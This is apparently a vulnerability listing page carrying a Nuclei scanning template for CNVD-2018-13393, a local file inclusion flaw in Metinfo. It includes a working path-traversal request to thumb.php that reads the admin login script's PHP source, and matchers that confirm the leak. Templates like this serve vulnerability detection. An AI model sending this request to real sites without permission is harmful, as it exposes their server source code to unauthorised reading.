漏洞描述
Metinfo is susceptible to local file inclusion.
CNVD-2018-13393: Metinfo - Local File Inclusion
PoC代码[已公开]
id: CNVD-2018-13393
info:
name: Metinfo - Local File Inclusion
author: ritikchaddha
severity: high
description: Metinfo is susceptible to local file inclusion.
reference:
- https://paper.seebug.org/676/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
metadata:
max-request: 1
tags: cnvd2018,cnvd,metinfo,cvnd2018,lfi
http:
- method: GET
path:
- '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php'
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<?php"
- "login_met_cookie($metinfo_admin_name);"
condition: and
# digest: 4b0a0048304602210084262ff34b90d15ace3655e1361b9efb0131637b12e80547255ee119743973630221008dd7131a28e80ceeb4aa238149c89956fe45d22f2464b1bb9cc4e8aab77b5b9e:922c64590222798bb761d5b6d8e72950